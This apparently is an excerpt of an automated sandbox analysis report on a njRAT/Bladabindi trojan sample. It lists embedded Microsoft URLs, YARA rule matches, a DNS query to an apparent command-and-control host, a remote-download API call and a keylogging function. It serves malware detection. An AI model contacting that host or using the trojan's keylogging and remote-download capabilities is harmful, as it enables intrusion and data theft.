        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://otelrules.azureedge.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://outlook.office365.com/connectors
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://powerlift.acompli.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://pushchannel.1drv.ms
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://res.cdn.office.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://res.cdn.office.net/polymer/models
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://settings.outlook.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://shell.suite.office.com:1443
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://skyapi.live.net/Activity/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://staging.cortana.ai
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://store.office.cn/addinstemplate
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://store.office.de/addinstemplate
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://substrate.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://tasks.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://web.microsoftstream.com/video/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://webshell.suite.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://wus2.contentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://wus2.pagecontentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://www.odwebp.svc.ms
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://www.yammer.com
        Source: unknown | DNS traffic detected: queries for: bmw2022.ddns.net
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DC4B54 URLDownloadToFileW
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, kl.cs | .Net Code: VKCodeToUnicode

        E-Banking Fraud

        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        System Summary

        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Code function: 0_2_00007FFD9B88172B
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00023049
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00022056
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001F9FE
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00024252
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00020BD0
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0002630E
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_000273D8
        Source: C:\ProgramData\essam@sasa2023.exe | Code function: 3_2_01130BF0
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_698ECBE6
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A8D81C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A8D064
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A79A50
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DDA9BE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DD9F12
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DDB09F
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DDC00B
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DBE49E
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DDA468
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D7F790
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DDC65E
        Source: C:\ProgramData\essam@sasa2023.exe | Code function: 11_2_04C10BE0
        Source: C:\ProgramData\essam@sasa2023.exe | Section loaded: sfc.dll
        Source: ESjy0irMIn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
